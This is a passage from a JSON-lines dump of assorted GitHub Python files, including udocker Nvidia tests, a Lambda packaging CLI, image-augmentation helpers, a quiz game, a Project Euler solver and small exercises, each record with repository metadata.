@patch('udocker.engine.nvidia.os.path.isdir')\n @patch('udocker.engine.nvidia.Msg')\n def test_08__find_cont_dir(self, mock_msg, mock_isdir):\n \"\"\"Test08 NvidiaMode._find_cont_dir.\"\"\"\n cdir = \"\"\n mock_msg.return_value.level.return_value = 0\n mock_isdir.side_effect = [False, False]\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._find_cont_dir()\n self.assertEqual(status, cdir)\n\n cdir = \"/usr/lib/x86_64-linux-gnu\"\n mock_msg.return_value.level.return_value = 0\n mock_isdir.side_effect = [True, False]\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._find_cont_dir()\n self.assertEqual(status, cdir)\n\n @patch.object(NvidiaMode, '_get_nvidia_libs')\n @patch.object(NvidiaMode, '_find_host_dir_ldconfig')\n @patch('udocker.engine.nvidia.Msg')\n def test_09__installation_exists(self, mock_msg, mock_ldconf,\n mock_libs):\n \"\"\"Test09 NvidiaMode._installation_exists.\"\"\"\n host_dir = \"/usr/lib\"\n cont_dir = \"/home/.udocker/cont/usr/lib\"\n mock_msg.return_value.level.return_value = 0\n mock_ldconf.side_effect = [set(), set(), set()]\n mock_libs.return_value = ['/lib/libnvidia.so']\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._installation_exists(host_dir, cont_dir)\n self.assertFalse(status)\n\n @patch('udocker.engine.nvidia.FileUtil.putdata')\n @patch.object(NvidiaMode, '_copy_files')\n @patch.object(NvidiaMode, '_get_nvidia_libs')\n @patch.object(NvidiaMode, '_installation_exists')\n @patch.object(NvidiaMode, '_find_cont_dir')\n @patch.object(NvidiaMode, '_find_host_dir')\n @patch('udocker.engine.nvidia.Msg')\n def test_10_set_mode(self, mock_msg, mock_findhdir,\n mock_findcdir, mock_instexist, mock_libs,\n mock_cpfiles, mock_futilput):\n \"\"\"Test10 NvidiaMode.set_mode().\"\"\"\n mock_msg.return_value.level.return_value = 0\n self.mock_cdcont.return_value = \"\"\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode.set_mode()\n self.assertTrue(mock_msg().err.called)\n self.assertFalse(status)\n\n self.mock_cdcont.return_value = \"/home/.udocker/cont\"\n mock_findhdir.return_value = set()\n mock_findcdir.return_value = \"/usr/lib/x86_64-linux-gnu\"\n nvmode = NvidiaMode(self.local, self.cont_id)\n nvmode.container_dir = \"/\" + self.cont_id\n status = nvmode.set_mode()\n self.assertTrue(mock_msg().err.called)\n self.assertFalse(status)\n\n self.mock_cdcont.return_value = \"/home/.udocker/cont\"\n host_dir = set()\n mock_findhdir.return_value = host_dir.update(\"/usr/lib\")\n mock_findcdir.return_value = \"\"\n nvmode = NvidiaMode(self.local, self.cont_id)\n nvmode.container_dir = \"/\" + self.cont_id\n status = nvmode.set_mode()\n self.assertTrue(mock_msg().err.called)\n self.assertFalse(status)\n\n # TODO: need work\n self.mock_cdcont.return_value = \"/home/.udocker/cont\"\n host_dir = set()\n host_dir.add(\"/usr/lib\")\n mock_findhdir.return_value = host_dir\n mock_findcdir.return_value = \"/usr/lib/x86_64-linux-gnu\"\n mock_libs.return_value = ['/lib/libnvidia.so']\n mock_instexist.return_value = False\n mock_cpfiles.side_effect = [True, True, True]\n mock_futilput.return_value = None\n nvmode = NvidiaMode(self.local, self.cont_id)\n nvmode.container_dir = \"/\" + self.cont_id\n status = nvmode.set_mode(True)\n self.assertTrue(mock_findhdir.called)\n self.assertTrue(mock_findcdir.called)\n # self.assertTrue(mock_instexist.called)\n # self.assertTrue(mock_futilput.called)\n # self.assertTrue(status)\n\n @patch('udocker.engine.nvidia.os.path.exists')\n def test_11_get_mode(self, mock_exists):\n \"\"\"Test11 NvidiaMode.get_mode().\"\"\"\n mock_exists.return_value = True\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode.get_mode()\n self.assertTrue(mock_exists.called)\n self.assertTrue(status)\n\n @patch('udocker.engine.nvidia.glob.glob')\n def test_12_get_devices(self, mock_glob):\n \"\"\"Test12 NvidiaMode.get_devices().\"\"\"\n mock_glob.return_value = ['/dev/nvidia']\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode.get_devices()\n self.assertEqual(status, Config().conf['nvi_dev_list'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"indigo-dc/udocker","sub_path":"tests/unit/test_nvidia.py","file_name":"test_nvidia.py","file_ext":"py","file_size_in_byte":10913,"program_lang":"python","lang":"en","doc_type":"code","stars":1118,"dataset":"github-code","pt":"34"} +{"seq_id":"33748283366","text":"from e2b import Session\n\nsession = Session.create(id=\"Nodejs\")\n\n# List the root directory\ncontent = session.filesystem.list(\"/\") # $HighlightLine\nfor item in content:\n print(f\"Is '{item.name}' directory?\", item.is_dir)\n\nsession.close()\n","repo_name":"mvandermeulen/e2b","sub_path":"apps/docs/src/code/python/basics/fs_ls.py","file_name":"fs_ls.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"38193368570","text":"import os\nimport subprocess\nimport click\n\n@click.group()\n#@click.option('--verbose', '-v', is_flag=True, help=\"Enables verbose output (not implemented)\")\ndef main():\n pass\n\n@main.command()\n@click.option('--project', '-p', default=\"lambdaify-project\", help=\"Name of the project. (Default: 'Lambdaify')\")\n@click.option('--project_directory', '-d', default='./', help=\"Directory to create project\")\n@click.option('--virtual_directory', '-v', help=\"Directory to create virtual environment (Default: Project dir\")\n@click.option('--python', default='/usr/local/bin/python3', help=\"Path to python executable for virtualenv (Default: /usr/local/bin/python3')\")\n@click.pass_context\ndef start(ctx, project, project_directory, python, virtual_directory):\n \"\"\"Create a project and a virtual environment\"\"\"\n abspath = os.path.abspath(__file__)\n dname = os.path.dirname(os.path.dirname(abspath))\n try:\n os.mkdir(project)\n subprocess.call('cp -r {}/project-template/ {}/{}'.format(dname, project_directory, project), shell=True)\n\n if not virtual_directory:\n virtual_directory = './{}'.format(project)\n ctx.invoke(virtualify, virtual_directory=virtual_directory, project=project)\n\n os.chdir('./{}'.format(project))\n print(os.getcwd())\n os.putenv('LAMBDAIFY_PROJECT', project)\n os.putenv('LAMBDAIFY_PROJECT_DIR', os.getcwd())\n\n click.echo(\"Created the project '{}' and its {} environment. Standing by to Lambdaify.\".format(project, python))\n except Exception as err:\n click.echo('Failed to startify {}: {}'.format(project, err))\n\n\n@main.command()\n@click.option('--virtual_directory', '-v', default='./', help=\"Directory to create virtual environment\")\n@click.option('--python', default='/usr/local/bin/python3', help=\"Path to python executable for virtualenv (Default: /usr/local/bin/python3)\")\ndef virtualify(virtual_directory, python, project=''):\n \"\"\"Create a virtualenv for a current project\"\"\"\n subprocess.call('virtualenv --python={} {}/.{}_venv'.format(python, virtual_directory, project), shell=True)\n click.echo(\"Run 'source {}{}venv/bin/activate' to use {}'s virtualenv\".format(virtual_directory, project, project))\n\n@main.command()\ndef stage():\n \"\"\"Create a staging directory in the virtual env\"\"\"\n click.echo('Stagifying project.')\n virtual_directory = os.environ['VIRTUAL_ENV']\n project_directory = os.environ['PWD']\n\n click.echo('\\tShipping the packages')\n os.chdir(virtual_directory)\n subprocess.call('rm -rf stageify', shell=True)\n os.mkdir('stageify')\n subprocess.call('cp -r {}/lib/python3.6/site-packages/ ./stageify/'.format(virtual_directory), shell=True)\n\n click.echo('\\tHunting for eggs.')\n stage_dir_items = os.listdir('./stageify')\n eggs = [item for item in stage_dir_items if item.endswith('egg-link')]\n egg_links = []\n for egg in eggs:\n click.echo('\\t\\t{}'.format(egg))\n f = open('./stageify/{}'.format(egg), 'r')\n egg_links.append(f.readline().rstrip('\\n'))\n f.close()\n for link in egg_links:\n egg_info = [item for item in os.listdir('{}'.format(link)) if item.endswith('egg-info')]\n f = open('{}/{}/top_level.txt'.format(link, egg_info[0]), 'r')\n top_level_files = f.readlines()\n f.close()\n for file in top_level_files:\n file = file.rstrip('\\n')\n subprocess.call('cp -r {}/{} ./stageify/'.format(link, file), shell=True)\n click.echo('\\t\\t- Copied {}/{} to staging area'.format(link, file))\n\n click.echo('\\tArming your lasers.')\n os.chdir(project_directory)\n subprocess.call('find . -name {} -prune -o -print0 | cpio -pmd0 {}/stageify/'.format(os.path.basename(virtual_directory), virtual_directory), shell=True)\n\n click.echo('Staging complete.')\n\n@main.command()\n@click.option('--lambda_handler', '-h', default='app.lambda_handler', help='The handler to be called (Default: app.lambda_handler)')\n@click.option('--detail', '-d', help='A JSON string to be sent to the event parameter')\ndef test(lambda_handler, detail):\n \"\"\"Test your project in a lambda docker clone\"\"\"\n subprocess.call('docker run --rm -v \"$VIRTUAL_ENV/stageify\":/var/task lambci/lambda:python3.6 {} \\'{}\\''.format(lambda_handler, detail), shell=True)\n\n@main.command()\ndef zip():\n \"\"\"Create a zip file to upload to lambda\"\"\"\n venv = os.environ['VIRTUAL_ENV']\n current_directory = os.getcwd()\n os.chdir('{}/stageify/'.format(venv))\n subprocess.call('zip -r {}/lambdaify.zip .'.format(current_directory), shell=True)\n\n\n","repo_name":"Thingable/lambdaify","sub_path":"lambdaify/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8341497068","text":"#运行时间:29ms 占用内存:5752k\r\n\r\n#将每层的数据存进ArrayList中,偶数层时进行reverse操作\r\n# -*- coding:utf-8 -*-\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n# -*- coding:utf-8 -*-\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\nclass Solution:\r\n def Print(self, pRoot):\r\n # write code here\r\n # 1.迭代 ,层遍历 左到右, 右到左\r\n if not pRoot :\r\n return []\r\n result=[]\r\n result_tmp=[pRoot]\r\n flag=0\r\n while result_tmp:\r\n tmp_list=[]\r\n r=[]\r\n for tmp in result_tmp:\r\n r.append(tmp.val)\r\n if tmp.left:\r\n tmp_list.append(tmp.left)\r\n if tmp.right:\r\n tmp_list.append(tmp.right)\r\n result_tmp=tmp_list\r\n if r and flag :\r\n result.append(r[::-1])\r\n flag=0\r\n elif r:\r\n result.append(r)\r\n flag=1\r\n \r\n return result\r\n \r\n\r\n \r\n \r\n ","repo_name":"peterpwb/leetcode","sub_path":"剑指Offer/按之字形顺序打印二叉树.py","file_name":"按之字形顺序打印二叉树.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4391640867","text":"from functions.functions_to_optimise import * \n\n\ndef config_pso():\n \"\"\"\n Return a config type with all the parameter to test \n\n You just have to change the params and rerun the pso_script you prefer \n\n Returns:\n dict: with all the hyperparameter,the constraint and the function to optimize \n \"\"\"\n \n params = {\n \"nb_part\" : 5, #Number of birds/ particules in one simulation\n \"vit\" : 0.1, # The velocity of the bird (will be decrease across the iteration) move it when the support of the function is large\n \"c1\" : 0.2, # The independance level of the particule from the group (Exploration level) c1 in [0,+inf[\n \"c2\" : 0.2, # The dependance level of the particule from the group (Exploitation level) c2 in [0,+inf[\n \"max_ite\" : 1000, # Number of iteration (moves) of each particules in the space in one MC simulation \n \"nb_simulation_MC\" : 20 , # The number of Monte Carlo simulation you want to do (to see the convergence)\n \"min_x\" : -5, # the minimum value that x_i can take, for all i = 1,...,\"Dim\"\n \"max_x\" : 5, # the maximum value that x_i can take, for all i = 1,...,\"Dim\"\n \"Dim\" : 2, # The number of variable in input if f(x) = y \"Dim\" = 1, if f(x,z) = y : \"Dim\" = 2 ... \n \"min_max\" : \"min\", # \"min\" if you want to minimize your function else \"maximize\"\n \"function\" : Rastrigin, # change here the function you want to optimize \n }\n \n return params\n\n","repo_name":"TheoAlegretti/PSO","sub_path":"config_pso.py","file_name":"config_pso.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7115586103","text":"#quiz game in python program\n#create a dictionary that stores questions and answers\n#have a variable that tracks the score of the player\n#loop through the dictionary using the key value pairs\n#display each question to the user and allow them to answers\n#tell them if they are right or wrong\n#show user the final result when quiz is completed\n\nprint(\"Welcome to the quiz!\")\n\nplaying = input(\"Do you want to play? \")\nif playing != \"yes\":\n quit()\nprint (\"Okay! Let's play :)\")\nprint (\"\")\n\nquiz = {\n \"question1\": {\n \"question\": \"What is the capital of India?\",\n \"answer\": \"New Delhi\"\n },\n \"question2\": {\n \"question\": \"What is the capital of Philippines?\",\n \"answer\": \"Manila\"\n },\n \"question3\": {\n \"question\": \"What is the capital of Germany?\",\n \"answer\": \"Berlin\"\n },\n \"question4\": {\n \"question\": \"What is the capital of Japan?\",\n \"answer\": \"Tokyo\"\n },\n \"question5\": {\n \"question\": \"What is the capital of Kenya?\",\n \"answer\": \"Nairobi\"\n },\n \"question6\": {\n \"question\": \"What is the capital of Norway?\",\n \"answer\": \"Oslo\"\n },\n \"question7\": {\n \"question\": \"What is the capital of Portugal?\",\n \"answer\": \"Lisbon\"\n },\n \"question8\": {\n \"question\": \"What is the capital of Sweden?\",\n \"answer\": \"Stockholm\"\n }, \n \"question9\": {\n \"question\": \"What is the capital of Colombia?\",\n \"answer\": \"Bogota\"\n },\n \"question10\": {\n \"question\": \"What is the capital of Finland?\",\n \"answer\": \"Helsinki\"\n }\n}\n\nscore = 0\n\nfor key, value in quiz.items():\n print(value['question'])\n answer = input ('Answer? ')\n \n if answer.lower() == value['answer'].lower():\n print ('Correct!')\n score = score + 1\n print ('Your score is ' + str(score))\n print (\"\")\n print (\"\")\n \n else:\n print('Wrong!')\n print ('The answer is : ' + value['answer'])\n print ('Your score is ' + str(score))\n print(\"\")\n print(\"\")\n \nprint (\"You got \" + str(score) + \" out of 10 questions correctly!\")\nprint (\"Your percentage is \" +str(int(score/10*100)) + \"%\")\n","repo_name":"Maryam0330/Python-Repo","sub_path":"quiz_game.py","file_name":"quiz_game.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"29782325030","text":"\"\"\"Tests for the vasculature component of the lung cancer hypermodel\n\"\"\"\n\nimport ChicCommon\nimport VesselComponent\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef analytical_solution(time, parameters):\n \n Vmax = parameters[0]\n Veq = parameters[1]\n V0 = parameters[2]\n \n req = parameters[3]\n rs = parameters[4]\n \n feq = parameters[5]\n f = parameters[6]\n \n if f >= feq:\n rmax = rs\n else:\n rmax = 0.0\n \n V = (rmax * (Vmax - (Vmax - V0) * math.exp(-(rmax + req) * time)) + \n req * (Veq - (Veq - V0) * math.exp(-(rmax + req) * time))) / (rmax + req)\n\n return V\n\ndef numerical_solution(timeIncrement, parameters):\n \n Vmax = parameters[0]\n Veq = parameters[1]\n V0 = parameters[2]\n \n req = parameters[3]\n rs = parameters[4]\n \n feq = parameters[5]\n f = parameters[6]\n \n if f >= feq:\n rmax = rs\n else:\n rmax = 0.0\n \n delta = (rmax * (Vmax - V0) - req * (V0 - Veq) )\n \n V = V0 + delta * timeIncrement \n return V\n\nVmax = 1.0\nVeq = 0.5\nV0 = 0.05\nreq = 0.1\nrs = 0.1\nfeq = 0.5\nf = 0.6\nendTime = 20\ntimeIncrement = 0.1\n\nparameters = [Vmax, Veq, V0, req, rs, feq, f]\n\n# Get the analytical solution\ntimeAnalytical = np.arange(0, endTime + timeIncrement, timeIncrement)\nvascAnalytical = []\nfor eachTime in timeAnalytical:\n vascAnalytical.append(analytical_solution(eachTime, parameters))\n \n# Get the numerical solution\ntimeNumerical = np.arange(0, endTime + timeIncrement, timeIncrement)\nvascNumerical = [V0]\nfor eachIncrement in range(len(timeNumerical) - 1):\n newVasc = numerical_solution(timeIncrement, parameters)\n parameters[2] = newVasc\n vascNumerical.append(newVasc)\n \n# Get the module solution\nvesselParameters = {\"name\": \"VesselSimulation\",\n \"numSteps\": 100,\n \"timeIncrement\": timeIncrement,\n \"outputFrequency\": 1,\n \"spacing\": 0.1,\n \"numX\": 10,\n \"numY\": 10,\n \"numZ\": 10,\n \"vMax\": 1.0,\n \"vEq\": 0.5,\n \"rMax\": 0.1,\n \"rEq\": 0.1,\n \"initialConditionFile\": None,\n \"coexecutionFile\": None,\n \"coexecutionWait\": 0.0} \n \noutputDirectory = os.getcwd()\nvesselSimulation = VesselComponent.VesselSimulation(outputDirectory, \n vesselParameters)\nfor eachCell in vesselSimulation.grid.cells:\n eachCell.set_cell_population(0.05)\n \nfor jdx, eachCell in enumerate(vesselSimulation.grid.cells):\n eachCell.factor = 0.6\n \ntimeModel = [0.0]\nvascModel = [0.05]\ndiff = [0]\nfor idx in range(100):\n vesselData = vesselSimulation.step(parentInput = True)\n timeModel.append((idx + 1) * timeIncrement)\n \n rsum = 0.0\n for eachEntry in vesselData:\n rsum = rsum + eachEntry[1]\n vascModel.append(rsum / len(vesselData))\n diffResult = abs((vascModel[idx + 1] - vascAnalytical[idx + 1]) / vascAnalytical[idx + 1])\n diff.append(diffResult)\n \n\n# Get the standalone solution\n#plt.plot(timeAnalytical, vascAnalytical, label='Analytical')\n#plt.plot(timeNumerical, vascNumerical, label='Numerical')\nplt.plot(timeModel, diff, marker='o',label='Component Model')\nplt.ylabel('Abs Relative Error')\nplt.xlabel('Time [T]')\nlegend = plt.legend(loc='upper center', shadow=True)\n#plt.axis([0, endTime , 0, 0.0015])\nplt.show()\n\n\n ","repo_name":"jmsgrogan/Chic","sub_path":"src/python-d6_2/LC_Hypermodel_Tests.py","file_name":"LC_Hypermodel_Tests.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32725671881","text":"import numpy as np\nimport cv2\n\n\ndef flip(images,labels,original_command,debug=False):\n if original_command.lower() == 'left':\n target_index = 0\n new_target_row = [0, 0, 1]\n new_command = 'right'\n elif original_command.lower() == 'up':\n target_index = 1\n new_target_row = [0, 1, 0]\n new_command = 'up'\n elif original_command.lower() == 'right':\n target_index = 2\n new_target_row = [1, 0, 0]\n new_command = 'left'\n flippables = images[np.where(labels[:, target_index] == 1)]\n if len(flippables) == 0:\n return [], []\n flipped_images = []\n new_target_array = []\n for image in flippables:\n flipped_image = cv2.flip(image, 1)\n flipped_images.append(flipped_image)\n new_target_array.append(new_target_row)\n flipped_images = np.array(flipped_images)\n new_target_array = np.array(new_target_array)\n if debug:\n for i in range(10):\n cv2.imshow(\"Original - {0} - {1}\".format(original_command,i), flippables[i])\n cv2.imshow(\"Flipped - {0} - {1}\".format(new_command,i), flipped_images[i])\n cv2.waitKey(0)\n return flipped_images, new_target_array\n\n\ndef flip_continuous(images,labels,debug=False):\n\n # Order of labels variables is angle, throttle. It\n # only makes sense to flip angle, so select the first\n # column, the one indexed at 0. The : means to apply\n # the transformation to all rows\n flipped_labels = labels.copy()\n flipped_labels[:, 0] = labels[:, 0] * -1\n flipped_images = []\n for image in images:\n flipped_image = cv2.flip(image, 1)\n flipped_images.append(flipped_image)\n flipped_images = np.array(flipped_images)\n if debug:\n for i in range(10):\n cv2.imshow(\"Original - {0}\".format(labels[i,:]), images[i,:])\n cv2.imshow(\"Flipped - {0}\".format(flipped_labels[i,:]), flipped_images[i,:])\n cv2.waitKey(0)\n return flipped_images, flipped_labels\n\n\ndef flip_enrichment(images,labels):\n new_right_images, new_right_labels = flip(images, labels, 'left', debug=False)\n new_left_images, new_left_labels = flip(images, labels, 'right', debug=False)\n new_up_images, new_up_labes = flip(images, labels, 'up', debug=False)\n if len(new_right_images) > 0:\n images = np.vstack((images, new_right_images))\n labels = np.vstack((labels, new_right_labels))\n if len(new_left_images) > 0:\n images = np.vstack((images, new_left_images))\n labels = np.vstack((labels, new_left_labels))\n if len(new_up_images) > 0:\n images = np.vstack((images, new_up_images))\n labels = np.vstack((labels, new_up_labes))\n return images, labels\n\ndef flip_enrichment_continuous(images,labels):\n image_images, new_labels = flip_continuous(images, labels, debug=False)\n images = np.vstack((images, image_images))\n labels = np.vstack((labels, new_labels))\n return images, labels\n\ndef normalize_contrast(images):\n normalized_images = []\n for image in images:\n img_yuv = cv2.cvtColor(image, cv2.COLOR_BGR2YUV)\n # equalize the histogram of the Y channel\n img_yuv[:, :, 0] = cv2.equalizeHist(img_yuv[:, :, 0])\n # convert the YUV image back to RGB format\n normalized_image = cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)\n normalized_images.append(normalized_image)\n normalized_images = np.array(normalized_images)\n return normalized_images\n\n\n# Collapses multiple data transformations; primarily used in model training scritps\ndef process_data(data):\n images, labels = data[0], data[1]\n images, labels = flip_enrichment(images, labels)\n images = apply_transformations(images)\n return images, labels\n\ndef resize_images(images,scale):\n inverted_decimal_scale = 1 / scale\n resized_images = []\n for original_image in images:\n resized_image = cv2.resize(\n original_image,\n None,\n fx=inverted_decimal_scale,\n fy=inverted_decimal_scale,\n interpolation=cv2.INTER_CUBIC\n )\n resized_images.append(resized_image)\n return resized_images\n\n# Collapses multiple data transformations; primarily used in model training scritps\ndef process_data_continuous(data, image_scale=1.0, crop_percent=1):\n images, labels = data[0], data[1]\n images, labels = flip_enrichment_continuous(images, labels)\n images = apply_transformations(images,image_scale,crop_percent)\n return images, labels\n\ndef crop_images(images, crop_percent):\n cropped_images = []\n # Assumes you want to keep bottom part of image and discard the top\n # In OpenCV, (0,0) represents top left pixel\n # https://stackoverflow.com/a/25644503/554481\n for original_image in images:\n shape = original_image.shape\n new_top_position = int(shape[0]) - int(shape[0] * (crop_percent / 100.0))\n new_bottom_position = int(shape[0])\n cropped_image = original_image[new_top_position:new_bottom_position]\n cropped_images.append(cropped_image)\n return cropped_images\n\n\n# https://www.pyimagesearch.com/2016/03/07/transparent-overlays-with-opencv/\ndef pseduo_crop(image, crop_percent, alpha):\n shape = image.shape\n new_top_position = int(shape[0] * (crop_percent / 100.0))\n\n # Create two copies of the original image -- one for\n # the overlay and one for the final output image\n overlay = image.copy()\n output = image.copy()\n\n # Draw a white rectangle over the cropped area\n # Open CV's coordinate system:\n # https://stackoverflow.com/a/25644503/554481\n '''\n 0/0---column--->\n |\n |\n row\n |\n |\n v\n '''\n top_left_corner = (0, 0)\n bottom_right_corner = (shape[1], new_top_position)\n rgb_color = (255, 255, 255)\n cv2.rectangle(\n overlay,\n top_left_corner,\n bottom_right_corner,\n rgb_color,\n -1\n )\n\n # Apply the overlay\n cv2.addWeighted(\n overlay,\n alpha,\n output,\n 1 - alpha,\n 0,\n output\n )\n\n return output\n\n\n# I've separated this from `process_data` so that I can use it in both training\n# and scoring. Relying on process_data alone wasn't sufficient for scoring\n# because during scoring the true labels aren't known at runtime\ndef apply_transformations(images, image_scale, crop_percent):\n images = normalize_contrast(images)\n images = images / 255\n if crop_percent > 0:\n images = crop_images(\n images=images,\n crop_percent=crop_percent\n )\n if image_scale != 1:\n images = resize_images(\n images=images,\n scale=image_scale\n )\n return images\n\ndef show_resize_effect(original_image, scale):\n smaller_scale = 1/scale\n shrunken_image = cv2.resize(original_image, None, fx=smaller_scale, fy=smaller_scale, interpolation=cv2.INTER_CUBIC)\n enlarged_image = cv2.resize(shrunken_image, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)\n return enlarged_image\n","repo_name":"RyanZotti/Self-Driving-Car","sub_path":"ai/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","stars":1020,"dataset":"github-code","pt":"34"} +{"seq_id":"47170250961","text":"def teens_number_word(n):\n lengths = {\n 1: 3, # one\n 2: 3, # two\n 3: 5, # three\n 4: 4, # four\n 5: 4, # five\n 6: 3, # six\n 7: 5, # seven\n 8: 5, # eight\n 9: 4, # nine\n 10: 3, # ten\n 11: 6, # eleven\n 12: 6, # twelve\n 13: 8, # thirteen\n 14: 8, # fourteen\n 15: 7, # fifteen\n 16: 7, # sixteen\n 17: 9, # seventeen\n 18: 8, # eighteen\n 19: 8, # nineteen\n 20: 6, # twenty\n 30: 6, # thirty\n 40: 5, # forty\n 50: 5, # fifty\n 60: 5, # sixty\n 70: 7, # seventy\n 80: 6, # eighty\n 90: 6} # ninety\n\n other = 0\n while lengths.get(n) == None:\n other += 1\n n -= 1\n\n n = lengths.get(n)\n if other != 0:\n n += teens_number_word(other)\n return n\n\ndef hundreds_number_word(n):\n hunnies = n // 100\n teens = n % 100\n result = 0\n\n if hunnies > 0:\n result += teens_number_word(hunnies) + 7\n if teens > 0:\n result += teens_number_word(teens)\n if hunnies > 0 and teens > 0:\n result += 3\n return result\n\ndef thousands_number_word(n):\n hunnies = n // 1000\n teens = n % 1000\n result = 0\n\n if hunnies > 0:\n result += hundreds_number_word(hunnies) + 8\n if teens > 0:\n result += hundreds_number_word(teens)\n return result\n\ndef solve(m):\n return sum(map(thousands_number_word, range(1, m+1)))\n","repo_name":"xfbs/euler","sub_path":"src/017-number-letter-counts/python/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25011897864","text":"\"\"\"Moosetash Exceptions\"\"\"\n\n\nclass MustacheSyntaxError(Exception):\n \"\"\"Error during parsing template\"\"\"\n\n @classmethod\n def from_template_pointer(cls, msg: str, template: str, pointer: int):\n \"\"\"Create syntax error with positional information\"\"\"\n\n line_number = template[:pointer].count('\\n') + 1\n return cls(msg.format(line_number=line_number))\n\n\nclass ContextAccessError(Exception):\n \"\"\"Error getting a variable from context\"\"\"\n\n\nclass LambdaException(ContextAccessError):\n \"\"\"Partial is missing from partials dictionary\"\"\"\n\n\nclass MissingVariable(Exception):\n \"\"\"Variable is missing from context\"\"\"\n\n\nclass MissingPartial(Exception):\n \"\"\"Partial is missing from partials dictionary\"\"\"\n","repo_name":"michaelrccurtis/moosetash","sub_path":"moosetash/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"25091952265","text":"#!/usr/bin/env python3\r\n\r\nimport sys\r\nfile_name = sys.argv[1]\r\nargs = sys.argv[2:]\r\n\r\nwith open(file_name, \"w\") as f:\r\n i = 0\r\n while i < len(args):\r\n f.write(args[i] + \"\\n\")\r\n i += 1\r\n","repo_name":"DuarteMartinho/CA116","sub_path":"Week8/labsheet8b/write-args.py","file_name":"write-args.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"18315820702","text":"# Write your solution here\n\nwordlist = []\nword_count = 0\n\nwhile True:\n\tword = input(\"Word: \")\n\tif word in wordlist:\n\t\tprint(f\"You typed in {word_count} different words\")\n\t\tbreak\n\tword_count += 1\n\twordlist.append(word)","repo_name":"jungleistx/Python-Programming-MOOC-2023","sub_path":"part04/03_lists/same_word_twice.py","file_name":"same_word_twice.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30838878892","text":"import datetime\nimport urllib.request\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\n\ndef filtermp3(link): \n mp3=[]\n for l in link:\n if l[len(l)-4:]=='.mp3':\n #print(l)\n mp3.append(l)\n return mp3\nclass song_mp3skull:\n def __init__(self,name,fckh):\n self.name=name\n self.url=\"http://mp3skull.com/search_db.php?q=\"+name+\"&fckh=\"+fckh\n self.html=''\n #print(self.url)\n self.get_html()\n self.soup=BeautifulSoup(self.html)\n self.links=[]\n self.urlnames=[]\n #print(self.url)\n self.get_links()\n\n def get_html(self):\n i=0\n maxi=100\n print(\"Connecting to site..\")\n while i\"+link\n self.urlnames.append(link)\n i=i+1\n #print(link)\n\n\n def savetofile(self):\n txt=\" \" \n def givelinks(self):\n return self.links\n def givenames(self):\n return self.urlnames\n\n\ndef getfckh(): \n try:\n htm=urllib.request.urlopen('http://mp3skull.com/').read()\n s=BeautifulSoup(htm)\n \n for inp in s.find_all('input'):\n nm=inp.get('name')\n\n if nm=='fckh':\n \n fckh=inp.get('value')\n open('link.txt','w').write(fckh)\n return\n except:\n \n print(\"something!\")\n return\n","repo_name":"sudheesh4/Mpy3","sub_path":"mp3skull.py","file_name":"mp3skull.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"24314127964","text":"\nscore = input(\"Enter Score: \")\n\ntry:\n f_score = float(score)\n\nexcept:\n print(\"Error, please enter numeric input\")\n quit()\n\nif f_score > 1.0 or f_score < 0:\n #print(\"Overtime\")\n print(\"ERROR, enter score between 0.0 and 1.0\")\nelse:\n #print(\"regular\")\n if f_score >= 0.9:\n print(\"A\")\n elif f_score >= 0.8:\n print(\"B\")\n elif f_score >= 0.7:\n print(\"C\")\n elif f_score >= 0.6:\n print(\"D\")\n else:\n print(\"F\")\n","repo_name":"TUC01108/py4e","sub_path":"ex_03_03/ex_03_03.py","file_name":"ex_03_03.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22217743619","text":"\"\"\" 242. Valid Anagram (Difficulty: Easy).\nhttps://leetcode.com/problems/valid-anagram/\n\nGiven two strings s and t, return true if t is an anagram of s, and false otherwise.\nAn Anagram is a word or phrase formed by rearranging the letters of a different word or phrase,\ntypically using all the original letters exactly once.\n\nExample 1:\nInput: s = \"anagram\", t = \"nagaram\"\nOutput: 